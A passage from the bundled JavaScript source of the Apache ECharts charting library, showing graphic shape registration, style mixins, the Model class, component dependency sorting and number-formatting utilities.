 var p = crossProduct2d(b1a1x, b1a1y, nx, ny) / nmCrossProduct;\n    if (p < 0 || p > 1) {\n        return false;\n    }\n\n    return true;\n}\n\n/**\n * Cross product of 2-dimension vector.\n */\nfunction crossProduct2d(x1, y1, x2, y2) {\n    return x1 * y2 - x2 * y1;\n}\n\nfunction nearZero(val) {\n    return val <= (1e-6) && val >= -(1e-6);\n}\n\n// Register built-in shapes. These shapes might be overwirtten\n// by users, although we do not recommend that.\nregisterShape('circle', Circle);\nregisterShape('sector', Sector);\nregisterShape('ring', Ring);\nregisterShape('polygon', Polygon);\nregisterShape('polyline', Polyline);\nregisterShape('rect', Rect);\nregisterShape('line', Line);\nregisterShape('bezierCurve', BezierCurve);\nregisterShape('arc', Arc);\n\n\n\n\nvar graphic = (Object.freeze || Object)({\n\tZ2_EMPHASIS_LIFT: Z2_EMPHASIS_LIFT,\n\tCACHED_LABEL_STYLE_PROPERTIES: CACHED_LABEL_STYLE_PROPERTIES,\n\textendShape: extendShape,\n\textendPath: extendPath,\n\tregisterShape: registerShape,\n\tgetShapeClass: getShapeClass,\n\tmakePath: makePath,\n\tmakeImage: makeImage,\n\tmergePath: mergePath,\n\tresizePath: resizePath,\n\tsubPixelOptimizeLine: subPixelOptimizeLine,\n\tsubPixelOptimizeRect: subPixelOptimizeRect,\n\tsubPixelOptimize: subPixelOptimize,\n\tsetElementHoverStyle: setElementHoverStyle,\n\tsetHoverStyle: setHoverStyle,\n\tsetAsHighDownDispatcher: setAsHighDownDispatcher,\n\tisHighDownDispatcher: isHighDownDispatcher,\n\tgetHighlightDigit: getHighlightDigit,\n\tsetLabelStyle: setLabelStyle,\n\tmodifyLabelStyle: modifyLabelStyle,\n\tsetTextStyle: setTextStyle,\n\tsetText: setText,\n\tgetFont: getFont,\n\tupdateProps: updateProps,\n\tinitProps: initProps,\n\tgetTransform: getTransform,\n\tapplyTransform: applyTransform$1,\n\ttransformDirection: transformDirection,\n\tgroupTransition: groupTransition,\n\tclipPointsByRect: clipPointsByRect,\n\tclipRectByRect: clipRectByRect,\n\tcreateIcon: createIcon,\n\tlinePolygonIntersect: linePolygonIntersect,\n\tlineLineIntersect: lineLineIntersect,\n\tGroup: Group,\n\tImage: ZImage,\n\tText: Text,\n\tCircle: Circle,\n\tSector: Sector,\n\tRing: Ring,\n\tPolygon: Polygon,\n\tPolyline: Polyline,\n\tRect: Rect,\n\tLine: Line,\n\tBezierCurve: BezierCurve,\n\tArc: Arc,\n\tIncrementalDisplayable: IncrementalDisplayble,\n\tCompoundPath: CompoundPath,\n\tLinearGradient: LinearGradient,\n\tRadialGradient: RadialGradient,\n\tBoundingRect: BoundingRect\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar PATH_COLOR = ['textStyle', 'color'];\n\nvar textStyleMixin = {\n    /**\n     * Get color property or get color from option.textStyle.color\n     * @param {boolean} [isEmphasis]\n     * @return {string}\n     */\n    getTextColor: function (isEmphasis) {\n        var ecModel = this.ecModel;\n        return this.getShallow('color')\n            || (\n                (!isEmphasis && ecModel) ? ecModel.get(PATH_COLOR) : null\n            );\n    },\n\n    /**\n     * Create font string from fontStyle, fontWeight, fontSize, fontFamily\n     * @return {string}\n     */\n    getFont: function () {\n        return getFont({\n            fontStyle: this.getShallow('fontStyle'),\n            fontWeight: this.getShallow('fontWeight'),\n            fontSize: this.getShallow('fontSize'),\n            fontFamily: this.getShallow('fontFamily')\n        }, this.ecModel);\n    },\n\n    getTextRect: function (text) {\n        return getBoundingRect(\n            text,\n            this.getFont(),\n            this.getShallow('align'),\n            this.getShallow('verticalAlign') || this.getShallow('baseline'),\n            this.getShallow('padding'),\n            this.getShallow('lineHeight'),\n            this.getShallow('rich'),\n            this.getShallow('truncateText')\n        );\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar getItemStyle = makeStyleMapper(\n    [\n        ['fill', 'color'],\n        ['stroke', 'borderColor'],\n        ['lineWidth', 'borderWidth'],\n        ['opacity'],\n        ['shadowBlur'],\n        ['shadowOffsetX'],\n        ['shadowOffsetY'],\n        ['shadowColor'],\n        ['textPosition'],\n        ['textAlign']\n    ]\n);\n\nvar itemStyleMixin = {\n    getItemStyle: function (excludes, includes) {\n        var style = getItemStyle(this, excludes, includes);\n        var lineDash = this.getBorderLineDash();\n        lineDash && (style.lineDash = lineDash);\n        return style;\n    },\n\n    getBorderLineDash: function () {\n        var lineType = this.get('borderType');\n        return (lineType === 'solid' || lineType == null) ? null\n            : (lineType === 'dashed' ? [5, 5] : [1, 1]);\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @module echarts/model/Model\n */\n\nvar mixin$1 = mixin;\nvar inner = makeInner();\n\n/**\n * @alias module:echarts/model/Model\n * @constructor\n * @param {Object} [option]\n * @param {module:echarts/model/Model} [parentModel]\n * @param {module:echarts/model/Global} [ecModel]\n */\nfunction Model(option, parentModel, ecModel) {\n    /**\n     * @type {module:echarts/model/Model}\n     * @readOnly\n     */\n    this.parentModel = parentModel;\n\n    /**\n     * @type {module:echarts/model/Global}\n     * @readOnly\n     */\n    this.ecModel = ecModel;\n\n    /**\n     * @type {Object}\n     * @protected\n     */\n    this.option = option;\n\n    // Simple optimization\n    // if (this.init) {\n    //     if (arguments.length <= 4) {\n    //         this.init(option, parentModel, ecModel, extraOpt);\n    //     }\n    //     else {\n    //         this.init.apply(this, arguments);\n    //     }\n    // }\n}\n\nModel.prototype = {\n\n    constructor: Model,\n\n    /**\n     * Model 的初始化函数\n     * @param {Object} option\n     */\n    init: null,\n\n    /**\n     * 从新的 Option merge\n     */\n    mergeOption: function (option) {\n        merge(this.option, option, true);\n    },\n\n    /**\n     * @param {string|Array.<string>} path\n     * @param {boolean} [ignoreParent=false]\n     * @return {*}\n     */\n    get: function (path, ignoreParent) {\n        if (path == null) {\n            return this.option;\n        }\n\n        return doGet(\n            this.option,\n            this.parsePath(path),\n            !ignoreParent && getParent(this, path)\n        );\n    },\n\n    /**\n     * @param {string} key\n     * @param {boolean} [ignoreParent=false]\n     * @return {*}\n     */\n    getShallow: function (key, ignoreParent) {\n        var option = this.option;\n\n        var val = option == null ? option : option[key];\n        var parentModel = !ignoreParent && getParent(this, key);\n        if (val == null && parentModel) {\n            val = parentModel.getShallow(key);\n        }\n        return val;\n    },\n\n    /**\n     * @param {string|Array.<string>} [path]\n     * @param {module:echarts/model/Model} [parentModel]\n     * @return {module:echarts/model/Model}\n     */\n    getModel: function (path, parentModel) {\n        var obj = path == null\n            ? this.option\n            : doGet(this.option, path = this.parsePath(path));\n\n        var thisParentModel;\n        parentModel = parentModel || (\n            (thisParentModel = getParent(this, path))\n                && thisParentModel.getModel(path)\n        );\n\n        return new Model(obj, parentModel, this.ecModel);\n    },\n\n    /**\n     * If model has option\n     */\n    isEmpty: function () {\n        return this.option == null;\n    },\n\n    restoreData: function () {},\n\n    // Pending\n    clone: function () {\n        var Ctor = this.constructor;\n        return new Ctor(clone(this.option));\n    },\n\n    setReadOnly: function (properties) {\n        // clazzUtil.setReadOnly(this, properties);\n    },\n\n    // If path is null/undefined, return null/undefined.\n    parsePath: function (path) {\n        if (typeof path === 'string') {\n            path = path.split('.');\n        }\n        return path;\n    },\n\n    /**\n     * @param {Function} getParentMethod\n     *        param {Array.<string>|string} path\n     *        return {module:echarts/model/Model}\n     */\n    customizeGetParent: function (getParentMethod) {\n        inner(this).getParent = getParentMethod;\n    },\n\n    isAnimationEnabled: function () {\n        if (!env$1.node) {\n            if (this.option.animation != null) {\n                return !!this.option.animation;\n            }\n            else if (this.parentModel) {\n                return this.parentModel.isAnimationEnabled();\n            }\n        }\n    }\n\n};\n\nfunction doGet(obj, pathArr, parentModel) {\n    for (var i = 0; i < pathArr.length; i++) {\n        // Ignore empty\n        if (!pathArr[i]) {\n            continue;\n        }\n        // obj could be number/string/... (like 0)\n        obj = (obj && typeof obj === 'object') ? obj[pathArr[i]] : null;\n        if (obj == null) {\n            break;\n        }\n    }\n    if (obj == null && parentModel) {\n        obj = parentModel.get(pathArr);\n    }\n    return obj;\n}\n\n// `path` can be null/undefined\nfunction getParent(model, path) {\n    var getParentMethod = inner(model).getParent;\n    return getParentMethod ? getParentMethod.call(model, path) : model.parentModel;\n}\n\n// Enable Model.extend.\nenableClassExtend(Model);\nenableClassCheck(Model);\n\nmixin$1(Model, lineStyleMixin);\nmixin$1(Model, areaStyleMixin);\nmixin$1(Model, textStyleMixin);\nmixin$1(Model, itemStyleMixin);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar base = 0;\n\n/**\n * @public\n * @param {string} type\n * @return {string}\n */\nfunction getUID(type) {\n    // Considering the case of crossing js context,\n    // use Math.random to make id as unique as possible.\n    return [(type || ''), base++, Math.random().toFixed(5)].join('_');\n}\n\n/**\n * @inner\n */\nfunction enableSubTypeDefaulter(entity) {\n\n    var subTypeDefaulters = {};\n\n    entity.registerSubTypeDefaulter = function (componentType, defaulter) {\n        componentType = parseClassType$1(componentType);\n        subTypeDefaulters[componentType.main] = defaulter;\n    };\n\n    entity.determineSubType = function (componentType, option) {\n        var type = option.type;\n        if (!type) {\n            var componentTypeMain = parseClassType$1(componentType).main;\n            if (entity.hasSubTypes(componentType) && subTypeDefaulters[componentTypeMain]) {\n                type = subTypeDefaulters[componentTypeMain](option);\n            }\n        }\n        return type;\n    };\n\n    return entity;\n}\n\n/**\n * Topological travel on Activity Network (Activity On Vertices).\n * Dependencies is defined in Model.prototype.dependencies, like ['xAxis', 'yAxis'].\n *\n * If 'xAxis' or 'yAxis' is absent in componentTypeList, just ignore it in topology.\n *\n * If there is circle dependencey, Error will be thrown.\n *\n */\nfunction enableTopologicalTravel(entity, dependencyGetter) {\n\n    /**\n     * @public\n     * @param {Array.<string>} targetNameList Target Component type list.\n     *                                           Can be ['aa', 'bb', 'aa.xx']\n     * @param {Array.<string>} fullNameList By which we can build dependency graph.\n     * @param {Function} callback Params: componentType, dependencies.\n     * @param {Object} context Scope of callback.\n     */\n    entity.topologicalTravel = function (targetNameList, fullNameList, callback, context) {\n        if (!targetNameList.length) {\n            return;\n        }\n\n        var result = makeDepndencyGraph(fullNameList);\n        var graph = result.graph;\n        var stack = result.noEntryList;\n\n        var targetNameSet = {};\n        each$1(targetNameList, function (name) {\n            targetNameSet[name] = true;\n        });\n\n        while (stack.length) {\n            var currComponentType = stack.pop();\n            var currVertex = graph[currComponentType];\n            var isInTargetNameSet = !!targetNameSet[currComponentType];\n            if (isInTargetNameSet) {\n                callback.call(context, currComponentType, currVertex.originalDeps.slice());\n                delete targetNameSet[currComponentType];\n            }\n            each$1(\n                currVertex.successor,\n                isInTargetNameSet ? removeEdgeAndAdd : removeEdge\n            );\n        }\n\n        each$1(targetNameSet, function () {\n            throw new Error('Circle dependency may exists');\n        });\n\n        function removeEdge(succComponentType) {\n            graph[succComponentType].entryCount--;\n            if (graph[succComponentType].entryCount === 0) {\n                stack.push(succComponentType);\n            }\n        }\n\n        // Consider this case: legend depends on series, and we call\n        // chart.setOption({series: [...]}), where only series is in option.\n        // If we do not have 'removeEdgeAndAdd', legendModel.mergeOption will\n        // not be called, but only sereis.mergeOption is called. Thus legend\n        // have no chance to update its local record about series (like which\n        // name of series is available in legend).\n        function removeEdgeAndAdd(succComponentType) {\n            targetNameSet[succComponentType] = true;\n            removeEdge(succComponentType);\n        }\n    };\n\n    /**\n     * DepndencyGraph: {Object}\n     * key: conponentType,\n     * value: {\n     *     successor: [conponentTypes...],\n     *     originalDeps: [conponentTypes...],\n     *     entryCount: {number}\n     * }\n     */\n    function makeDepndencyGraph(fullNameList) {\n        var graph = {};\n        var noEntryList = [];\n\n        each$1(fullNameList, function (name) {\n\n            var thisItem = createDependencyGraphItem(graph, name);\n            var originalDeps = thisItem.originalDeps = dependencyGetter(name);\n\n            var availableDeps = getAvailableDependencies(originalDeps, fullNameList);\n            thisItem.entryCount = availableDeps.length;\n            if (thisItem.entryCount === 0) {\n                noEntryList.push(name);\n            }\n\n            each$1(availableDeps, function (dependentName) {\n                if (indexOf(thisItem.predecessor, dependentName) < 0) {\n                    thisItem.predecessor.push(dependentName);\n                }\n                var thatItem = createDependencyGraphItem(graph, dependentName);\n                if (indexOf(thatItem.successor, dependentName) < 0) {\n                    thatItem.successor.push(name);\n                }\n            });\n        });\n\n        return {graph: graph, noEntryList: noEntryList};\n    }\n\n    function createDependencyGraphItem(graph, name) {\n        if (!graph[name]) {\n            graph[name] = {predecessor: [], successor: []};\n        }\n        return graph[name];\n    }\n\n    function getAvailableDependencies(originalDeps, fullNameList) {\n        var availableDeps = [];\n        each$1(originalDeps, function (dep) {\n            indexOf(fullNameList, dep) >= 0 && availableDeps.push(dep);\n        });\n        return availableDeps;\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* A third-party license is embeded for some of the code in this file:\n* The method \"quantile\" was copied from \"d3.js\".\n* (See more details in the comment of the method below.)\n* The use of the source code of this file is also subject to the terms\n* and consitions of the license of \"d3.js\" (BSD-3Clause, see\n* </licenses/LICENSE-d3>).\n*/\n\nvar RADIAN_EPSILON = 1e-4;\n\nfunction _trim(str) {\n    return str.replace(/^\\s+|\\s+$/g, '');\n}\n\n/**\n * Linear mapping a value from domain to range\n * @memberOf module:echarts/util/number\n * @param  {(number|Array.<number>)} val\n * @param  {Array.<number>} domain Domain extent domain[0] can be bigger than domain[1]\n * @param  {Array.<number>} range  Range extent range[0] can be bigger than range[1]\n * @param  {boolean} clamp\n * @return {(number|Array.<number>}\n */\nfunction linearMap(val, domain, range, clamp) {\n    var subDomain = domain[1] - domain[0];\n    var subRange = range[1] - range[0];\n\n    if (subDomain === 0) {\n        return subRange === 0\n            ? range[0]\n            : (range[0] + range[1]) / 2;\n    }\n\n    // Avoid accuracy problem in edge, such as\n    // 146.39 - 62.83 === 83.55999999999999.\n    // See echarts/test/ut/spec/util/number.js#linearMap#accuracyError\n    // It is a little verbose for efficiency considering this method\n    // is a hotspot.\n    if (clamp) {\n        if (subDomain > 0) {\n            if (val <= domain[0]) {\n                return range[0];\n            }\n            else if (val >= domain[1]) {\n                return range[1];\n            }\n        }\n        else {\n            if (val >= domain[0]) {\n                return range[0];\n            }\n            else if (val <= domain[1]) {\n                return range[1];\n            }\n        }\n    }\n    else {\n        if (val === domain[0]) {\n            return range[0];\n        }\n        if (val === domain[1]) {\n            return range[1];\n        }\n    }\n\n    return (val - domain[0]) / subDomain * subRange + range[0];\n}\n\n/**\n * Convert a percent string to absolute number.\n * Returns NaN if percent is not a valid string or number\n * @memberOf module:echarts/util/number\n * @param {string|number} percent\n * @param {number} all\n * @return {number}\n */\nfunction parsePercent$1(percent, all) {\n    switch (percent) {\n        case 'center':\n        case 'middle':\n            percent = '50%';\n            break;\n        case 'left':\n        case 'top':\n            percent = '0%';\n            break;\n        case 'right':\n        case 'bottom':\n            percent = '100%';\n            break;\n    }\n    if (typeof percent === 'string') {\n        if (_trim(percent).match(/%$/)) {\n            return parseFloat(percent) / 100 * all;\n        }\n\n        return parseFloat(percent);\n    }\n\n    return percent == null ? NaN : +percent;\n}\n\n/**\n * (1) Fix rounding error of float numbers.\n * (2) Support return string to avoid scientific notation like '3.5e-7'.\n *\n * @param {number} x\n * @param {number} [precision]\n * @param {boolean} [returnStr]\n * @return {number|string}\n */\nfunction round$1(x, precision, returnStr) {\n    if (precision == null) {\n        precision = 10;\n    }\n    // Avoid range error\n    precision = Math.min(Math.max(0, precision), 20);\n    x = (+x).toFixed(precision);\n    return returnStr ? x : +x;\n}\n\n/**\n * asc sort arr.\n * The input arr will be modified.\n *\n * @param {Array} arr\n * @return {Array} The input arr.\n */\nfunction asc(arr) {\n    arr.sort(function (a, b) {\n        return a - b;\n    });\n    return arr;\n}\n\n/**\n * Get precision\n * @param {number} val\n */\nfunction getPrecision(val) {\n    val = +val;\n    if (isNaN(val)) {\n        return 0;\n    }\n    // It is much faster than methods converting number to string as follows\n    //      var tmp = val.toString();\n    //      return tmp.length - 1 - tmp.indexOf('.');\n    // especially when precision is low\n    var e = 1;\n    var count = 0;\n    while (Math.round(val * e) / e !== val) {\n        e *= 10;\n        count++;\n    }\n    return count;\n}\n\n/**\n * @param {string|number} val\n * @return {number}\n */\nfunction getPrecisionSafe(val) {\n    var str = val.toString();\n\n    // Consider scientific notation: '3.4e-12' '3.4e+12'\n    var eIndex = str.indexOf('e');\n    if (eIndex > 0) {\n        var precision = +str.slice(eIndex + 1);\n        return precision < 0 ? -precision : 0;\n    }\n    else {\n        var dotIndex = str.indexOf('.');\n        return dotIndex < 0 ? 0 : str.length - 1 - dotIndex;\n    }\n}\n\n/**\n * Minimal dicernible data precisioin according to a single pixel.\n *\n * @param {Array.<number>} dataExtent\n * @param {Array.<number>} pixelExtent\n * @return {number} precision\n */\nfunction getPixelPrecision(dataExtent, pixelExtent) {\n    var log = Math.log;\n    var LN10 = Math.LN10;\n    var dataQuantity = Math.floor(log(dataExtent[1] - dataExtent[0]) / LN10);\n    var sizeQuantity = Math.round(log(Math.abs(pixelExtent[1] - pixelExtent[0])) / LN10);\n    // toFixed() digits argument must be between 0 and 20.\n    var precision = Math.min(Math.max(-dataQuantity + sizeQuantity, 0), 20);\n    return !isFinite(precision) ? 20 : precision;\n}\n\n/**\n * Get a data of given precision, assuring the sum of percentages\n * in valueList is 1.\n * The largest remainer method is used.\n * https://en.wikipedia.org/wiki/Largest_remainder_method\n *\n * @param {Array.<number>} valueList a list of all data\n * @param {number} idx index of the data to be processed in valueList\n * @param {number} precision integer number showing digits of precision\n * @return {number} percent ranging from 0 to 100\n */\nfunction getPercentWithPrecision(valueList, idx, precision) {\n    if (!valueList[idx]) {\n        return 0;\n    }\n\n    var sum = reduce(valueList, function (acc, val) {\n        return acc + (isNaN(val) ? 0 : val);\n    }, 0);\n    if (sum === 0) {\n        return 0;\n    }\n\n    var digits = Math.pow(10, precision);\n    var votesPerQuota = map(valueList, function (val) {\n        return (isNaN(val) ? 0 : val) / sum * digits * 100;\n    });\n    var targetSeats = digits * 100;\n\n    var seats = map(votesPerQuota, function (votes) {\n        // Assign automatic seats.\n        return Math.floor(votes);\n    });\n    var currentSum = reduce(seats, function (acc, val) {\n        return acc + val;\n    }, 0);\n\n    var remainder = map(votesPerQuota, function (votes, idx) {\n        return votes - seats[idx];\n    });\n\n    // Has remainding votes.\n    while (currentSum < targetSeats) {\n        // Find next largest remainder.\n        var max = Number.NEGATIVE_INFINITY;\n        var maxId = null;\n        for (var i = 0, len = remainder.length; i < len; ++i) {\n            if (remainder[i] > max) {\n                max = remainder[i];\n                maxId = i;\n            }\n        }\n\n        // Add a vote to max remainder.\n        ++seats[maxId];\n        remainder[maxId] = 0;\n        ++currentSum;\n    }\n\n    return seats[idx] / digits;\n}\n\n// Number.MAX_SAFE_INTEGER, ie do not support.\nvar MAX_SAFE_INTEGER = 9007199254740991;\n\n/**\n * To 0 - 2 * PI, considering negative radian.\n * @param {number} radian\n * @return {number}\n */\nfunction remRadian(radian) {\n    var pi2 = Math.PI * 2;\n    return (radian % pi2 + pi2) % pi2;\n}\n\n/**\n * @param {type} radian\n * @return {boolean}\n */\nfunction isRadianAroundZero(val) {\n    return val > -RADIAN_EPSILON && val < RADIAN_EPSILON;\n}\n\n/* eslint-disable */\nvar TIME_REG = /^(?:(\\d{4})(?:[-\\/](\\d{1,2})(?:[-\\/](\\d{1,2})(?:[T ](\\d{1,2})(?::(\\d\\d)(?::(\\d\\d)(?:[.,](\\d+))?)?)?(Z|[\\+\\-]\\d\\d:?\\d\\d)?)?)?)?)?$/; // jshint ignore:line\n/* eslint-enable */\n\n/**\n * @param {string|Date|number} value These values can be accepted:\n *   + An instance of Date, represent a time in its own time zone.\n *   + Or string in a subset of ISO 8601, only including:\n *     + only year, month, date: '2012-03', '2012-03-01', '2012-03-01 05', '2012-03-01 05:06',\n *     + separated with T or space: '2012-03-01T12:22:33.123', '2012-03-01 12:22:33.123',\n *     + time zone: '2012-03-01T12:22:33Z', '2012-03-01T12:22:33+8000', '2012-03-01T12:22:33-05:00',\n *     all of which will be treated as local time if time zone is not specified\n *     (see <https://momentjs.com/>).\n *   + Or other string format, including (all of which will be treated as loacal time):\n *     '2012', '2012-3-1', '2012/3/1', '2012/03/01',\n *     '2009/6/12 2:00', '2009/6/12 2:05:08', '2009/6/12 2:05:08.123'\n *   + a timestamp, which represent a time in UTC.\n * @return {Date} date\n */\nfunction parseDate(value) {\n    if (value instanceof Date) {\n        return value;\n    }\n    else if (typeof value === 'string') {\n        // Different browsers parse date in different way, so we parse it manually.\n        // Some other issues:\n        // new Date('1970-01-01') is UTC,\n        // new Date('1970/01/01') and new Date('1970-1-01') is local.\n        // See issue #3623\n        var match = TIME_REG.exec(value);\n\n        if (!match) {\n            // return Invalid Date.\n            return new Date(NaN);\n        }\n\n        // Use local time when no timezone offset specifed.\n        if (!match[8]) {\n            // match[n] can only be string or undefined.\n            // But take care of '12' + 1 => '121'.\n            return new Date(\n                +match[1],\n                +(match[2] || 1) - 1,\n                +match[3] || 1,\n                +match[4] || 0,\n                +(match[5] || 0),\n                +match[6] || 0,\n                +match[7] || 0\n            );\n        }\n        // Timezoneoffset of Javascript Date has considered DST (Daylight Saving Time,\n        // https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).\n        // For example, system timezone is set as \"Time Zone: America/Toronto\",\n        // then these code will get different result:\n        // `new Date(1478411999999).getTimezoneOffset();  // get 240`\n        // `new Date(1478412000000).getTimezoneOffset();  // get 300`\n        // So we should not use `new Date`, but use `Date.UTC`.\n        else {\n            var hour = +match[4] || 0;\n            if (match[8].toUpperCase() !== 'Z') {\n                hour -= match[8].slice(0, 3);\n            }\n            return new Date(Date.UTC(\n                +match[1],\n                +(match[2] || 1) - 1,\n                +match[3] || 1,\n                hour,\n                +(match[5] || 0),\n                +match[6] || 0,\n                +match[7] || 0\n            ));\n        }\n    }\n    else if (value == null) {\n        return new Date(NaN);\n    }\n\n    return new Date(Math.round(value));\n}\n\n/**\n * Quantity of a number. e.g. 0.1, 1, 10, 100\n *\n * @param  {number} val\n * @return {number}\n */\nfunction quantity(val) {\n    return Math.pow(10, quantityExponent(val));\n}\n\n/**\n * Exponent of the quantity of a number\n * e.g., 1234 equals to 1.234*10^3, so quantityExponent(1234) is 3\n *\n * @param  {number} val non-negative value\n * @return {number}\n */\nfunction quantityExponent(val) {\n    if (val === 0) {\n        return 0;\n    }\n\n    var exp = Math.floor(Math.log(val) / Math.LN10);\n    /**\n     * exp is expected to be the rounded-down result of the base-10 log of val.\n     * But due to the precision loss with Math.log(val), we need to restore it\n     * using 10^exp to make sure we can get val back from exp. #11249\n     */\n    if (val / Math.pow(10, exp) >= 10) {\n        exp++;\n    }\n    return exp;\n}\n\n/**\n * find a “nice” number approximately equal to x. Round the number if round = true,\n * take ceiling if round = false. The primary observation is that the “nicest”\n * numbers in decimal are 1, 2, and 5, and all power-of-ten multiples of these numbers.\n *\n * See \"Nice Numbers for Graph Labels\" of Graphic Gems.\n *\n * @param  {number} val Non-negative value.\n * @param  {boolean} round\n * @return {number}\n */\nfunction nice(val, round) {\n    var exponent = quantityExponent(val);\n    var exp10 = Math.pow(10, exponent);\n    var f = val / exp10; // 1 <= f < 10\n    var nf;\n    if (round) {\n        if (f < 1.5) {\n            nf = 1;\n        }\n        else if (f < 2.5) {\n            nf = 2;\n        }\n        else if (f < 4) {\n            nf = 3;\n        }\n        else if (f < 7) {\n            nf = 5;\n        }\n        else {\n            nf = 10;\n        }\n    }\n    else {\n        if (f < 1) {\n            nf = 1;\n        }\n        else if (f < 2) {\n            nf = 2;\n        }\n        else if (f < 3) {\n            nf = 3;\n        }\n        else if (f < 5) {\n            nf = 5;\n        }\n        else {\n            nf = 10;\n        }\n    }\n    val = nf * exp10;\n\n    // Fix 3 * 0.1 === 0.30000000000000004 issue (see IEEE 754).\n    // 20 is the uppper bound of toFixed.\n    return exponent >= -20 ? +val.toFixed(exponent < 0 ? -exponent : 0) : val;\n}\n\n/**\n * This code was copied from \"d3.js\"\n * <https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js>.\n * See the license statement at the head of this file.\n * @param {Array.<number>} ascArr\n */\nfunction quantile(ascArr, p) {\n    var H = (ascArr.length - 1) * p + 1;\n    var h = Math.floor(H);\n    var v = +ascArr[h - 1];\n    var e = H - h;\n    return e ? v + e * (ascArr[h] - v) : v;\n}\n\n/**\n * Order intervals asc, and split them when overlap.\n * expect(numberUtil.reformIntervals([\n *     {interval: [18, 62], close: [1, 1]},\n *     {interval: [-Infinity, -70], close: [0, 0]},\n *     {interval: [-70, -26], close: [1, 1]},\n *     {interval: [-26, 18], close: [1, 1]},\n *     {interval: [62, 150], close: [1, 1]},\n *     {interval: [106, 150], close: [1, 1]},\n *     {interval: [150, Infinity], close: [0, 0]}\n * ])).toEqual([\n *     {interval: [-Infinity, -70], close: [0, 0]},\n *     {interval: [-70, -26], close: [1, 1]},\n *     {interval: [-26, 18], close: [0, 1]},\n *     {interval: [18, 62], close: [0, 1]},\n *     {interval: [62, 150], close: [0, 1]},\n *     {interval: [150, Infinity], close: [0, 0]}\n * ]);\n * @param {Array.<Object>} list, where `close` mean open or close\n *        of the interval, and Infinity can be used.\n * @return {Array.<Object>} The origin list, which has been reformed.\n */\nfunction reformIntervals(list) {\n    list.sort(function (a, b) {\n        return littleThan(a, b, 0) ? -1 : 1;\n    });\n\n    var curr = -Infinity;\n    var currClose = 1;\n    for (var i = 0; i < list.length;) {\n        var interval = list[i].interval;\n        var close = list[i].close;\n\n        for (var lg = 0; lg < 2; lg++) {\n            if (interval[lg] <= curr) {\n                interval[lg] = curr;\n                close[lg] = !lg ? 1 - currClose : 1;\n            }\n            curr = interval[lg];\n            currClose = close[lg];\n        }\n\n        if (interval[0] === interval[1] && close[0] * close[1] !== 1) {\n            list.splice(i, 1);\n        }\n        else {\n            i++;\n        }\n    }\n\n    return list;\n\n    function littleThan(a, b, lg) {\n        return a.interval[lg] < b.interval[lg]\n            || (\n                a.interval[lg] === b.interval[lg]\n                && (\n                    (a.close[lg] - b.close[lg] === (!lg ? 1 : -1))\n                    || (!lg && littleThan(a, b, 1))\n                )\n            );\n    }\n}\n\n/**\n * parseFloat NaNs numeric-cast false positives (null|true|false|\"\")\n * ...but misinterprets leading-number strings, particularly hex literals (\"0x...\")\n * subtraction forces infinities to NaN\n *\n * @param {*} v\n * @return {boolean}\n */\nfunction isNumeric(v) {\n    return v - parseFloat(v) >= 0;\n}\n\n\nvar number = (Object.freeze || Object)({\n\tlinearMap: linearMap,\n\tparsePercent: parsePercent$1,\n\tround: round$1,\n\tasc: asc,\n\tgetPrecision: getPrecision,\n\tgetPrecisionSafe: getPrecisionSafe,\n\tgetPixelPrecision: getPixelPrecision,\n\tgetPercentWithPrecision: getPercentWithPrecision,\n\tMAX_SAFE_INTEGER: 